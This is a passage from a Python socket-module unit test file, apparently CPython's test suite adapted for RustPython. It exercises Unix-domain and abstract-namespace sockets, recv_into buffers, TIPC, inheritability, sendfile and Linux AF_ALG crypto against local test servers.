self.fail("caught unexpected exception (UDP)")
if not ok:
self.fail("recv() returned success when we did not expect it")
class TestExceptions(unittest.TestCase):
def testExceptionTree(self):
self.assertTrue(issubclass(OSError, Exception))
self.assertTrue(issubclass(socket.herror, OSError))
self.assertTrue(issubclass(socket.gaierror, OSError))
self.assertTrue(issubclass(socket.timeout, OSError))
def test_setblocking_invalidfd(self):
# Regression test for issue #28471
sock0 = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
sock = socket.socket(
socket.AF_INET, socket.SOCK_STREAM, 0, sock0.fileno())
sock0.close()
self.addCleanup(sock.detach)
with self.assertRaises(OSError):
sock.setblocking(False)
@unittest.skipUnless(sys.platform == 'linux', 'Linux specific test')
class TestLinuxAbstractNamespace(unittest.TestCase):
UNIX_PATH_MAX = 108
def testLinuxAbstractNamespace(self):
address = b"\x00python-test-hello\x00\xff"
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s1:
s1.bind(address)
s1.listen()
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s2:
s2.connect(s1.getsockname())
with s1.accept()[0] as s3:
self.assertEqual(s1.getsockname(), address)
self.assertEqual(s2.getpeername(), address)
def testMaxName(self):
address = b"\x00" + b"h" * (self.UNIX_PATH_MAX - 1)
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
s.bind(address)
self.assertEqual(s.getsockname(), address)
def testNameOverflow(self):
address = "\x00" + "h" * self.UNIX_PATH_MAX
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
self.assertRaises(OSError, s.bind, address)
def testStrName(self):
# Check that an abstract name can be passed as a string.
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
try:
s.bind("\x00python\x00test\x00")
self.assertEqual(s.getsockname(), b"\x00python\x00test\x00")
finally:
s.close()
def testBytearrayName(self):
# Check that an abstract name can be passed as a bytearray.
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
s.bind(bytearray(b"\x00python\x00test\x00"))
self.assertEqual(s.getsockname(), b"\x00python\x00test\x00")
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'test needs socket.AF_UNIX')
class TestUnixDomain(unittest.TestCase):
def setUp(self):
self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
def tearDown(self):
self.sock.close()
def encoded(self, path):
# Return the given path encoded in the file system encoding,
# or skip the test if this is not possible.
try:
return os.fsencode(path)
except UnicodeEncodeError:
self.skipTest(
"Pathname {0!a} cannot be represented in file "
"system encoding {1!r}".format(
path, sys.getfilesystemencoding()))
def bind(self, sock, path):
# Bind the socket
try:
support.bind_unix_socket(sock, path)
except OSError as e:
if str(e) == "AF_UNIX path too long":
self.skipTest(
"Pathname {0!a} is too long to serve as an AF_UNIX path"
.format(path))
else:
raise
def testUnbound(self):
# Issue #30205 (note getsockname() can return None on OS X)
self.assertIn(self.sock.getsockname(), ('', None))
def testStrAddr(self):
# Test binding to and retrieving a normal string pathname.
path = os.path.abspath(support.TESTFN)
self.bind(self.sock, path)
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testBytesAddr(self):
# Test binding to a bytes pathname.
path = os.path.abspath(support.TESTFN)
self.bind(self.sock, self.encoded(path))
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
# TODO: RUSTPYTHON, surrogateescape
@unittest.expectedFailure
def testSurrogateescapeBind(self):
# Test binding to a valid non-ASCII pathname, with the
# non-ASCII bytes supplied using surrogateescape encoding.
path = os.path.abspath(support.TESTFN_UNICODE)
b = self.encoded(path)
self.bind(self.sock, b.decode("ascii", "surrogateescape"))
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testUnencodableAddr(self):
# Test binding to a pathname that cannot be encoded in the
# file system encoding.
if support.TESTFN_UNENCODABLE is None:
self.skipTest("No unencodable filename available")
path = os.path.abspath(support.TESTFN_UNENCODABLE)
self.bind(self.sock, path)
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
class BufferIOTest(SocketConnectedTest):
"""
Test the buffer versions of socket.recv() and socket.send().
"""
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def testRecvIntoArray(self):
buf = array.array("B", [0] * len(MSG))
nbytes = self.cli_conn.recv_into(buf)
self.assertEqual(nbytes, len(MSG))
buf = buf.tobytes()
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
def _testRecvIntoArray(self):
buf = bytes(MSG)
self.serv_conn.send(buf)
def testRecvIntoBytearray(self):
buf = bytearray(1024)
nbytes = self.cli_conn.recv_into(buf)
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvIntoBytearray = _testRecvIntoArray
def testRecvIntoMemoryview(self):
buf = bytearray(1024)
nbytes = self.cli_conn.recv_into(memoryview(buf))
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvIntoMemoryview = _testRecvIntoArray
def testRecvFromIntoArray(self):
buf = array.array("B", [0] * len(MSG))
nbytes, addr = self.cli_conn.recvfrom_into(buf)
self.assertEqual(nbytes, len(MSG))
buf = buf.tobytes()
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
def _testRecvFromIntoArray(self):
buf = bytes(MSG)
self.serv_conn.send(buf)
def testRecvFromIntoBytearray(self):
buf = bytearray(1024)
nbytes, addr = self.cli_conn.recvfrom_into(buf)
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvFromIntoBytearray = _testRecvFromIntoArray
def testRecvFromIntoMemoryview(self):
buf = bytearray(1024)
nbytes, addr = self.cli_conn.recvfrom_into(memoryview(buf))
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvFromIntoMemoryview = _testRecvFromIntoArray
def testRecvFromIntoSmallBuffer(self):
# See issue #20246.
buf = bytearray(8)
self.assertRaises(ValueError, self.cli_conn.recvfrom_into, buf, 1024)
def _testRecvFromIntoSmallBuffer(self):
self.serv_conn.send(MSG)
def testRecvFromIntoEmptyBuffer(self):
buf = bytearray()
self.cli_conn.recvfrom_into(buf)
self.cli_conn.recvfrom_into(buf, 0)
_testRecvFromIntoEmptyBuffer = _testRecvFromIntoArray
TIPC_STYPE = 2000
TIPC_LOWER = 200
TIPC_UPPER = 210
def isTipcAvailable():
"""Check if the TIPC module is loaded
The TIPC module is not loaded automatically on Ubuntu and probably
other Linux distros.
"""
if not hasattr(socket, "AF_TIPC"):
return False
try:
f = open("/proc/modules")
except (FileNotFoundError, IsADirectoryError, PermissionError):
# It's ok if the file does not exist, is a directory or if we
# have not the permission to read it.
return False
with f:
for line in f:
if line.startswith("tipc "):
return True
return False
@unittest.skipUnless(isTipcAvailable(),
"TIPC module is not loaded, please 'sudo modprobe tipc'")
class TIPCTest(unittest.TestCase):
def testRDM(self):
srv = socket.socket(socket.AF_TIPC, socket.SOCK_RDM)
cli = socket.socket(socket.AF_TIPC, socket.SOCK_RDM)
self.addCleanup(srv.close)
self.addCleanup(cli.close)
srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srvaddr = (socket.TIPC_ADDR_NAMESEQ, TIPC_STYPE,
TIPC_LOWER, TIPC_UPPER)
srv.bind(srvaddr)
sendaddr = (socket.TIPC_ADDR_NAME, TIPC_STYPE,
TIPC_LOWER + int((TIPC_UPPER - TIPC_LOWER) / 2), 0)
cli.sendto(MSG, sendaddr)
msg, recvaddr = srv.recvfrom(1024)
self.assertEqual(cli.getsockname(), recvaddr)
self.assertEqual(msg, MSG)
@unittest.skipUnless(isTipcAvailable(),
"TIPC module is not loaded, please 'sudo modprobe tipc'")
class TIPCThreadableTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName = 'runTest'):
unittest.TestCase.__init__(self, methodName = methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.srv = socket.socket(socket.AF_TIPC, socket.SOCK_STREAM)
self.addCleanup(self.srv.close)
self.srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srvaddr = (socket.TIPC_ADDR_NAMESEQ, TIPC_STYPE,
TIPC_LOWER, TIPC_UPPER)
self.srv.bind(srvaddr)
self.srv.listen()
self.serverExplicitReady()
self.conn, self.connaddr = self.srv.accept()
self.addCleanup(self.conn.close)
def clientSetUp(self):
# There is a hittable race between serverExplicitReady() and the
# accept() call; sleep a little while to avoid it, otherwise
# we could get an exception
time.sleep(0.1)
self.cli = socket.socket(socket.AF_TIPC, socket.SOCK_STREAM)
self.addCleanup(self.cli.close)
addr = (socket.TIPC_ADDR_NAME, TIPC_STYPE,
TIPC_LOWER + int((TIPC_UPPER - TIPC_LOWER) / 2), 0)
self.cli.connect(addr)
self.cliaddr = self.cli.getsockname()
def testStream(self):
msg = self.conn.recv(1024)
self.assertEqual(msg, MSG)
self.assertEqual(self.cliaddr, self.connaddr)
def _testStream(self):
self.cli.send(MSG)
self.cli.close()
class ContextManagersTest(ThreadedTCPSocketTest):
def _testSocketClass(self):
# base test
with socket.socket() as sock:
self.assertFalse(sock._closed)
self.assertTrue(sock._closed)
# close inside with block
with socket.socket() as sock:
sock.close()
self.assertTrue(sock._closed)
# exception inside with block
with socket.socket() as sock:
self.assertRaises(OSError, sock.sendall, b'foo')
self.assertTrue(sock._closed)
def testCreateConnectionBase(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
data = conn.recv(1024)
conn.sendall(data)
def _testCreateConnectionBase(self):
address = self.serv.getsockname()
with socket.create_connection(address) as sock:
self.assertFalse(sock._closed)
sock.sendall(b'foo')
self.assertEqual(sock.recv(1024), b'foo')
self.assertTrue(sock._closed)
def testCreateConnectionClose(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
data = conn.recv(1024)
conn.sendall(data)
def _testCreateConnectionClose(self):
address = self.serv.getsockname()
with socket.create_connection(address) as sock:
sock.close()
self.assertTrue(sock._closed)
self.assertRaises(OSError, sock.sendall, b'foo')
class InheritanceTest(unittest.TestCase):
@unittest.skipUnless(hasattr(socket, "SOCK_CLOEXEC"),
"SOCK_CLOEXEC not defined")
@support.requires_linux_version(2, 6, 28)
def test_SOCK_CLOEXEC(self):
with socket.socket(socket.AF_INET,
socket.SOCK_STREAM | socket.SOCK_CLOEXEC) as s:
self.assertEqual(s.type, socket.SOCK_STREAM)
self.assertFalse(s.get_inheritable())
def test_default_inheritable(self):
sock = socket.socket()
with sock:
self.assertEqual(sock.get_inheritable(), False)
def test_dup(self):
sock = socket.socket()
with sock:
newsock = sock.dup()
sock.close()
with newsock:
self.assertEqual(newsock.get_inheritable(), False)
def test_set_inheritable(self):
sock = socket.socket()
with sock:
sock.set_inheritable(True)
self.assertEqual(sock.get_inheritable(), True)
sock.set_inheritable(False)
self.assertEqual(sock.get_inheritable(), False)
@unittest.skipIf(fcntl is None, "need fcntl")
def test_get_inheritable_cloexec(self):
sock = socket.socket()
with sock:
fd = sock.fileno()
self.assertEqual(sock.get_inheritable(), False)
# clear FD_CLOEXEC flag
flags = fcntl.fcntl(fd, fcntl.F_GETFD)
flags &= ~fcntl.FD_CLOEXEC
fcntl.fcntl(fd, fcntl.F_SETFD, flags)
self.assertEqual(sock.get_inheritable(), True)
@unittest.skipIf(fcntl is None, "need fcntl")
def test_set_inheritable_cloexec(self):
sock = socket.socket()
with sock:
fd = sock.fileno()
self.assertEqual(fcntl.fcntl(fd, fcntl.F_GETFD) & fcntl.FD_CLOEXEC,
fcntl.FD_CLOEXEC)
sock.set_inheritable(True)
self.assertEqual(fcntl.fcntl(fd, fcntl.F_GETFD) & fcntl.FD_CLOEXEC,
0)
def test_socketpair(self):
s1, s2 = socket.socketpair()
self.addCleanup(s1.close)
self.addCleanup(s2.close)
self.assertEqual(s1.get_inheritable(), False)
self.assertEqual(s2.get_inheritable(), False)
@unittest.skipUnless(hasattr(socket, "SOCK_NONBLOCK"),
"SOCK_NONBLOCK not defined")
class NonblockConstantTest(unittest.TestCase):
def checkNonblock(self, s, nonblock=True, timeout=0.0):
if nonblock:
self.assertEqual(s.type, socket.SOCK_STREAM)
self.assertEqual(s.gettimeout(), timeout)
self.assertTrue(
fcntl.fcntl(s, fcntl.F_GETFL, os.O_NONBLOCK) & os.O_NONBLOCK)
if timeout == 0:
# timeout == 0: means that getblocking() must be False.
self.assertFalse(s.getblocking())
else:
# If timeout > 0, the socket will be in a "blocking" mode
# from the standpoint of the Python API. For Python socket
# object, "blocking" means that operations like 'sock.recv()'
# will block. Internally, file descriptors for
# "blocking" Python sockets *with timeouts* are in a
# *non-blocking* mode, and 'sock.recv()' uses 'select()'
# and handles EWOULDBLOCK/EAGAIN to enforce the timeout.
self.assertTrue(s.getblocking())
else:
self.assertEqual(s.type, socket.SOCK_STREAM)
self.assertEqual(s.gettimeout(), None)
self.assertFalse(
fcntl.fcntl(s, fcntl.F_GETFL, os.O_NONBLOCK) & os.O_NONBLOCK)
self.assertTrue(s.getblocking())
@support.requires_linux_version(2, 6, 28)
def test_SOCK_NONBLOCK(self):
# a lot of it seems silly and redundant, but I wanted to test that
# changing back and forth worked ok
with socket.socket(socket.AF_INET,
socket.SOCK_STREAM | socket.SOCK_NONBLOCK) as s:
self.checkNonblock(s)
s.setblocking(1)
self.checkNonblock(s, nonblock=False)
s.setblocking(0)
self.checkNonblock(s)
s.settimeout(None)
self.checkNonblock(s, nonblock=False)
s.settimeout(2.0)
self.checkNonblock(s, timeout=2.0)
s.setblocking(1)
self.checkNonblock(s, nonblock=False)
# defaulttimeout
t = socket.getdefaulttimeout()
socket.setdefaulttimeout(0.0)
with socket.socket() as s:
self.checkNonblock(s)
socket.setdefaulttimeout(None)
with socket.socket() as s:
self.checkNonblock(s, False)
socket.setdefaulttimeout(2.0)
with socket.socket() as s:
self.checkNonblock(s, timeout=2.0)
socket.setdefaulttimeout(None)
with socket.socket() as s:
self.checkNonblock(s, False)
socket.setdefaulttimeout(t)
@unittest.skipUnless(os.name == "nt", "Windows specific")
@unittest.skipUnless(multiprocessing, "need multiprocessing")
@unittest.skip("TODO: RUSTPYTHON, socket sharing")
class TestSocketSharing(SocketTCPTest):
# This must be classmethod and not staticmethod or multiprocessing
# won't be able to bootstrap it.
@classmethod
def remoteProcessServer(cls, q):
# Recreate socket from shared data
sdata = q.get()
message = q.get()
s = socket.fromshare(sdata)
s2, c = s.accept()
# Send the message
s2.sendall(message)
s2.close()
s.close()
def testShare(self):
# Transfer the listening server socket to another process
# and service it from there.
# Create process:
q = multiprocessing.Queue()
p = multiprocessing.Process(target=self.remoteProcessServer, args=(q,))
p.start()
# Get the shared socket data
data = self.serv.share(p.pid)
# Pass the shared socket to the other process
addr = self.serv.getsockname()
self.serv.close()
q.put(data)
# The data that the server will send us
message = b"slapmahfro"
q.put(message)
# Connect
s = socket.create_connection(addr)
# listen for the data
m = []
while True:
data = s.recv(100)
if not data:
break
m.append(data)
s.close()
received = b"".join(m)
self.assertEqual(received, message)
p.join()
def testShareLength(self):
data = self.serv.share(os.getpid())
self.assertRaises(ValueError, socket.fromshare, data[:-1])
self.assertRaises(ValueError, socket.fromshare, data+b"foo")
def compareSockets(self, org, other):
# socket sharing is expected to work only for blocking socket
# since the internal python timeout value isn't transferred.
self.assertEqual(org.gettimeout(), None)
self.assertEqual(org.gettimeout(), other.gettimeout())
self.assertEqual(org.family, other.family)
self.assertEqual(org.type, other.type)
# If the user specified "0" for proto, then
# internally windows will have picked the correct value.
# Python introspection on the socket however will still return
# 0. For the shared socket, the python value is recreated
# from the actual value, so it may not compare correctly.
if org.proto != 0:
self.assertEqual(org.proto, other.proto)
def testShareLocal(self):
data = self.serv.share(os.getpid())
s = socket.fromshare(data)
try:
self.compareSockets(self.serv, s)
finally:
s.close()
def testTypes(self):
families = [socket.AF_INET, socket.AF_INET6]
types = [socket.SOCK_STREAM, socket.SOCK_DGRAM]
for f in families:
for t in types:
try:
source = socket.socket(f, t)
except OSError:
continue # This combination is not supported
try:
data = source.share(os.getpid())
shared = socket.fromshare(data)
try:
self.compareSockets(source, shared)
finally:
shared.close()
finally:
source.close()
class SendfileUsingSendTest(ThreadedTCPSocketTest):
"""
Test the send() implementation of socket.sendfile().
"""
FILESIZE = (10 * 1024 * 1024) # 10 MiB
BUFSIZE = 8192
FILEDATA = b""
TIMEOUT = 2
@classmethod
def setUpClass(cls):
def chunks(total, step):
assert total >= step
while total > step:
yield step
total -= step
if total:
yield total
chunk = b"".join([random.choice(string.ascii_letters).encode()
for i in range(cls.BUFSIZE)])
with open(support.TESTFN, 'wb') as f:
for csize in chunks(cls.FILESIZE, cls.BUFSIZE):
f.write(chunk)
with open(support.TESTFN, 'rb') as f:
cls.FILEDATA = f.read()
assert len(cls.FILEDATA) == cls.FILESIZE
@classmethod
def tearDownClass(cls):
support.unlink(support.TESTFN)
def accept_conn(self):
self.serv.settimeout(MAIN_TIMEOUT)
conn, addr = self.serv.accept()
conn.settimeout(self.TIMEOUT)
self.addCleanup(conn.close)
return conn
def recv_data(self, conn):
received = []
while True:
chunk = conn.recv(self.BUFSIZE)
if not chunk:
break
received.append(chunk)
return b''.join(received)
def meth_from_sock(self, sock):
# Depending on the mixin class being run return either send()
# or sendfile() method implementation.
return getattr(sock, "_sendfile_use_send")
# regular file
def _testRegularFile(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, self.FILESIZE)
self.assertEqual(file.tell(), self.FILESIZE)
def testRegularFile(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# non regular file
def _testNonRegularFile(self):
address = self.serv.getsockname()
file = io.BytesIO(self.FILEDATA)
with socket.create_connection(address) as sock, file as file:
sent = sock.sendfile(file)
self.assertEqual(sent, self.FILESIZE)
self.assertEqual(file.tell(), self.FILESIZE)
self.assertRaises(socket._GiveupOnSendfile,
sock._sendfile_use_sendfile, file)
def testNonRegularFile(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# empty file
def _testEmptyFileSend(self):
address = self.serv.getsockname()
filename = support.TESTFN + "2"
with open(filename, 'wb'):
self.addCleanup(support.unlink, filename)
file = open(filename, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, 0)
self.assertEqual(file.tell(), 0)
def testEmptyFileSend(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(data, b"")
# offset
def _testOffset(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file, offset=5000)
self.assertEqual(sent, self.FILESIZE - 5000)
self.assertEqual(file.tell(), self.FILESIZE)
def testOffset(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE - 5000)
self.assertEqual(data, self.FILEDATA[5000:])
# count
def _testCount(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
count = 5000007
meth = self.meth_from_sock(sock)
sent = meth(file, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count)
@unittest.skipIf(sys.platform == "darwin", "TODO: RUSTPYTHON, killed (for OOM?)")
def testCount(self):
count = 5000007
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[:count])
# count small
def _testCountSmall(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
count = 1
meth = self.meth_from_sock(sock)
sent = meth(file, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count)
def testCountSmall(self):
count = 1
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[:count])
# count + offset
def _testCountWithOffset(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
count = 100007
meth = self.meth_from_sock(sock)
sent = meth(file, offset=2007, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count + 2007)
def testCountWithOffset(self):
count = 100007
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[2007:count+2007])
# non blocking sockets are not supposed to work
def _testNonBlocking(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
sock.setblocking(False)
meth = self.meth_from_sock(sock)
self.assertRaises(ValueError, meth, file)
self.assertRaises(ValueError, sock.sendfile, file)
def testNonBlocking(self):
conn = self.accept_conn()
if conn.recv(8192):
self.fail('was not supposed to receive any data')
# timeout (non-triggered)
def _testWithTimeout(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, self.FILESIZE)
@unittest.skipIf(sys.platform == "darwin", "TODO: RUSTPYTHON, killed (for OOM?)")
def testWithTimeout(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# timeout (triggered)
def _testWithTimeoutTriggeredSend(self):
address = self.serv.getsockname()
with open(support.TESTFN, 'rb') as file:
with socket.create_connection(address) as sock:
sock.settimeout(0.01)
meth = self.meth_from_sock(sock)
self.assertRaises(socket.timeout, meth, file)
def testWithTimeoutTriggeredSend(self):
conn = self.accept_conn()
conn.recv(88192)
# errors
def _test_errors(self):
pass
def test_errors(self):
with open(support.TESTFN, 'rb') as file:
with socket.socket(type=socket.SOCK_DGRAM) as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(
ValueError, "SOCK_STREAM", meth, file)
with open(support.TESTFN, 'rt') as file:
with socket.socket() as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(
ValueError, "binary mode", meth, file)
with open(support.TESTFN, 'rb') as file:
with socket.socket() as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(TypeError, "positive integer",
meth, file, count='2')
self.assertRaisesRegex(TypeError, "positive integer",
meth, file, count=0.1)
self.assertRaisesRegex(ValueError, "positive integer",
meth, file, count=0)
self.assertRaisesRegex(ValueError, "positive integer",
meth, file, count=-1)
@unittest.skipUnless(hasattr(os, "sendfile"),
'os.sendfile() required for this test.')
class SendfileUsingSendfileTest(SendfileUsingSendTest):
"""
Test the sendfile() implementation of socket.sendfile().
"""
def meth_from_sock(self, sock):
return getattr(sock, "_sendfile_use_sendfile")
@unittest.skipUnless(HAVE_SOCKET_ALG, 'AF_ALG required')
class LinuxKernelCryptoAPI(unittest.TestCase):
# tests for AF_ALG
def create_alg(self, typ, name):
sock = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
try:
sock.bind((typ, name))
except FileNotFoundError as e:
# type / algorithm is not available
sock.close()
raise unittest.SkipTest(str(e), typ, name)
else:
return sock
# bpo-31705: On kernel older than 4.5, sendto() failed with ENOKEY,
# at least on ppc64le architecture
@support.requires_linux_version(4, 5)
def test_sha256(self):
expected = bytes.fromhex("ba7816bf8f01cfea414140de5dae2223b00361a396"
"177a9cb410ff61f20015ad")
with self.create_alg('hash', 'sha256') as algo:
op, _ = algo.accept()
with op:
op.sendall(b"abc")
self.assertEqual(op.recv(512), expected)
op, _ = algo.accept()
with op:
op.send(b'a', socket.MSG_MORE)
op.send(b'b', socket.MSG_MORE)
op.send(b'c', socket.MSG_MORE)
op.send(b'')
self.assertEqual(op.recv(512), expected)
def test_hmac_sha1(self):
expected = bytes.fromhex("effcdf6ae5eb2fa2d27416d5f184df9c259a7c79")
with self.create_alg('hash', 'hmac(sha1)') as algo:
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, b"Jefe")
op, _ = algo.accept()
with op:
op.sendall(b"what do ya want for nothing?")
self.assertEqual(op.recv(512), expected)
# Although it should work with 3.19 and newer the test blocks on
# Ubuntu 15.10 with Kernel 4.2.0-19.
@support.requires_linux_version(4, 3)
def test_aes_cbc(self):
key = bytes.fromhex('06a9214036b8a15b512e03d534120006')
iv = bytes.fromhex('3dafba429d9eb430b422da802c9fac41')
msg = b"Single block msg"
ciphertext = bytes.fromhex('e353779c1079aeb82708942dbe77181a')
msglen = len(msg)
with self.create_alg('skcipher', 'cbc(aes)') as algo:
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, key)
op, _ = algo.accept()
with op:
op.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, iv=iv,
flags=socket.MSG_MORE)
op.sendall(msg)
self.assertEqual(op.recv(msglen), ciphertext)
op, _ = algo.accept()
with op:
op.sendmsg_afalg([ciphertext],
op=socket.ALG_OP_DECRYPT, iv=iv)
self.assertEqual(op.recv(msglen), msg)
# long message
multiplier = 1024
longmsg = [msg] * multiplier
op, _ = algo.accept()
with op:
op.sendmsg_afalg(longmsg,
op=socket.ALG_OP_ENCRYPT, iv=iv)
enc = op.recv(msglen * multiplier)
self.assertEqual(len(enc), msglen * multiplier)
self.assertEqual(enc[:msglen], ciphertext)
op, _ = algo.accept()
with op:
op.sendmsg_afalg([enc],
op=socket.ALG_OP_DECRYPT, iv=iv)
dec = op.recv(msglen * multiplier)
self.assertEqual(len(dec), msglen * multiplier)
self.assertEqual(dec, msg * multiplier)
@support.requires_linux_version(4, 9) # see issue29324
def test_aead_aes_gcm(self):
key = bytes.fromhex('c939cc13397c1d37de6ae0e1cb7c423c')
iv = bytes.fromhex('b3d8cc017cbb89b39e0f67e2')
plain = bytes.fromhex('c3b3c41f113a31b73d9a5cd432103069')
assoc = bytes.fromhex('24825602bd12a984e0092d3e448eda5f')
expected_ct = bytes.fromhex('93fe7d9e9bfd10348a5606e5cafa7354')
expected_tag = bytes.fromhex('0032a1dc85f1c9786925a2e71d8272dd')
taglen = len(expected_tag)
assoclen = len(assoc)
with self.create_alg('aead', 'gcm(aes)') as algo:
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, key)
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_AEAD_AUTHSIZE,
None, taglen)
# send assoc, plain and tag buffer in separate steps
op, _ = algo.accept()
with op:
op.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, iv=iv,
assoclen=assoclen, flags=socket.MSG_MORE)
op.sendall(assoc, socket.MSG_MORE)
op.sendall(plain)
res = op.recv(assoclen + len(plain) + taglen)
self.assertEqual(expected_ct, res[assoclen:-taglen])
self.assertEqual(expected_tag, res[-taglen:])
# now with msg
op, _ = algo.accept()
with op:
msg = assoc + plain
op.sendmsg_afalg([msg], op=socket.ALG_OP_ENCRYPT, iv=iv,
assoclen=assoclen)
res = op.recv(assoclen + len(plain) + taglen)
self.assertEqual(expected_ct, res[assoclen:-taglen])
self.assertEqual(expected_tag, res[-taglen:])
# create anc data manually
pack_uint32 = struct.Struct('I').pack
op, _ = algo.accept()
with op:
msg = assoc + plain
op.sendmsg(
[msg],
([socket.SOL_ALG, socket.ALG_SET_OP, pack_uint32(socket.ALG_OP_ENCRYPT)],
[socket.SOL_ALG, socket.ALG_SET_IV, pack_uint32(len(iv)) + iv],
[socket.SOL_ALG, socket.ALG_SET_AEAD_ASSOCLEN, pack_uint32(assoclen)],
)
)
res = op.recv(len(msg) + taglen)
self.assertEqual(expected_ct, res[assoclen:-taglen])
self.assertEqual(expected_tag, res[-taglen:])
# decrypt and verify
op, _ = algo.accept()
with op:
msg = assoc + expected_ct + expected_tag
op.sendmsg_afalg([msg], op=socket.ALG_OP_DECRYPT, iv=iv,
assoclen=assoclen)
res = op.recv(len(msg) - taglen)
self.assertEqual(plain, res[assoclen:])
@support.requires_linux_version(4, 3) # see test_aes_cbc
def test_drbg_pr_sha256(self):
# deterministic random bit generator, prediction resistance, sha256
with self.create_alg('rng', 'drbg_pr_sha256') as algo:
extra_seed = os.urandom(32)
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, extra_seed)
op, _ = algo.accept()
with op:
rn = op.recv(32)
self.assertEqual(len(rn), 32)
def test_sendmsg_afalg_args(self):
sock = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
with sock:
with self.assertRaises(TypeError):
sock.sendmsg_afalg()
with self.assertRaises(TypeError):
sock.sendmsg_afalg(op=None)
with self.assertRaises(TypeError):
sock.sendmsg_afalg(1)
with self.assertRaises(TypeError):
sock.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, assoclen=None)
with self.assertRaises(TypeError):
sock.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, assoclen=-1)
def test_length_restriction(self):
# bpo-35050, off-by-one error in length check
sock = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
self.addCleanup(sock.close)
# salg_type[14]
with self.assertRaises(FileNotFoundError):
sock.bind(("t" * 13, "name"))
with self.assertRaisesRegex(ValueError, "type too long"):
sock.bind(("t" * 14, "name"))
# salg_name[64]
with self.assertRaises(FileNotFoundError):
sock.bind(("type", "n" * 63))
with self.assertRaisesRegex(ValueError, "name too long"):
sock.bind(("type", "n" * 64))
@unittest.skipUnless(sys.platform.startswith("win"), "requires Windows")
class TestMSWindowsTCPFlags(unittest.TestCase):
knownTCPFlags = {
# available since long time ago
'TCP_MAXSEG',
'TCP_NODELAY',
# available starting with Windows 10 1607
